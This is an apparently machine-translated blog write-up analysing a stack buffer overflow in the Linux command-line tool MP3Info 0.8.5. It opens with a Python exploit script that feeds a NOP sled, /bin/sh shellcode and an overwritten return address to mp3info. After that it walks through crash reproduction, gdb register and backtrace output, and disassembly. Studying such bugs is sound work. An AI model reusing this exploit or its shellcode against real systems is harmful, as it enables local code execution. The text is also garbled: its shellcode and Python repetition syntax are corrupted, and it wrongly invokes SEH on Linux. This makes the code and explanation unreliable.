Author: k0shl reprint please indicate the source: http://whereisk0shl.top
junk = "\x90\x90\x90\x90"8 shellcode = "\x31\xc0\x50\x68/\x68/bin\x89\the XE3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" buffer = "\x90\x90\x90\x90"89 eip = "\x10\xf0\xff\xbf"
print "# MP3info is prone to a Stack-BoF" print "# Wasting CPU clocks on unusable exploits" print "# This is exploit is for educational purposes"
try: subprocess. call(["mp3info", junk+shellcode+buffer+eip]) except OSError as e: if e. errno == os. errno. ENOENT: print "MP3Info not found!" else: print "Error executing exploit" raise
This vulnerability is a local code execution vulnerability, poc mean in fact, is called mp3info, a command line incoming malformations string, you can directly use$python-c method incoming malformations string you can also. With gdb open, and then run $python-c + deformity of the string you can directly reach the vulnerability scene, this is my debug of the first Linux vulnerability, the vulnerability basis of comparison, the representative.
This vulnerability is my first post to linux analysis, hereby Memorial! GET a lot of new linux debugging method, very rewarding.
This vulnerability does not like the details described above, but in the process the MP3 path, since the path is not read, and proceeds to error handling process, errors of the file path passed as the error information of the incoming linux's perror()function, in the process the error occurred, into the SEH exception function, and then by overwriting the SEH pointer arbitrary code execution. The following of this vulnerability for detailed analysis.
First of all we need under linux to compile MP3Info, you need to download a dependency of the header file libncurses5-dev,after the installation you can compile MP3Info and, after compilation, we do not use poc, the direct use of the python input malformation string.
root@root:~/Desktop/mp3info-0.8.5 a -#. / mp3info $(python-c 'print "\x41"100') Error opening MP3: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA: No such file or directory root@root:~/Desktop/mp3info-0.8.5 a -#. / mp3info $(python-c 'print "\x41"700') Segmentation fault
You can see that when the deformity of the string length reaches 700 when prompted Segmentation fault, that is, pointer errors, or the occurrence of a buffer overflow. We used gdb-peda's look at the time of the crash information.
The first is the crash point.
[-------------------------------------code-------------------------------------] 0xb7e067cb <__GI_getenv+107>: mov esi,DWORD PTR [ebp+0x0] 0xb7e067ce <__GI_getenv+110>: test esi,esi 0xb7e067d0 <__GI_getenv+112>: je 0xb7e0682a <__GI_getenv+202> => 0xb7e067d2 <__GI_getenv+114>: cmp di,WORD PTR [esi]
You can see that in cmp the comparison statement when an error occurs, the basic can be judged esi register is Non-readable addresses.
[----------------------------------registers-----------------------------------] EAX: 0x6 EBX: 0xb7f7c000 --> 0x1a5da8 ECX: 0x414c ('LA') EDX: 0xffbab8be ESI: 0x41414141 ('AAAA')
You can see the ESI value is really unreadable address 41414141, so we are now back stack calls.
at getenv. c:85
categoryname=0xb7f1c953 <_nl_category_names+51> "LC_MESSAGES", category=<optimized out>) at dcigettext. c:1356
domainname=domainname@entry=0xb7f32fae <_libc_intl_domainname> "libc", msgid1=msgid1@entry=0xb7f336a5 "File name too long", msgid2=msgid2@entry=0x0, plural=plural@entry=0x0, n=n@entry=0x0, category=category@entry=0x5) at dcigettext. c:561
domainname=0xb7f32fae <_libc_intl_domainname> "libc", msgid=0xb7f336a5 "File name too long", category=category@entry=0x5) at dcgettext. c:52
buf=buf@entry=0xbfffea20"@\360\377\267", buflen=buflen@entry=0x400) at _strerror. c:71
s=s@entry=0xbffff040 "Error opening MP3: ", 'A' <installed or support 181 times>..., errnum=errnum@entry=0x24) at perror. c:37
s=0xbffff040 "Error opening MP3: ", 'A' <installed or support 181 times>...) at perror. c:74
argc=<error reading variable: Cannot access memory at address 0x41414141>, argv=<error reading variable: Cannot access memory at address 0x41414145>) at mp3info. c:195 Backtrace stopped: previous frame inner to this frame (corrupt stack?)
Our main view 0x08049597 the location of the call, because after it enters the system function, then we from 0x08049597 this starting position, for analysis.
Through the ida open the elf file, we look at 0x08049597 at the call.
loc_804957B: fp = eax; FILE * lea edi, [ebp+error_msg] fp = edx ; FILE * push eax push dword ptr [esi] push offset aErrorOpeningMp ; "Error opening MP3: %s" push edi ; s call _sprintf mov [esp], edi ; s call _perror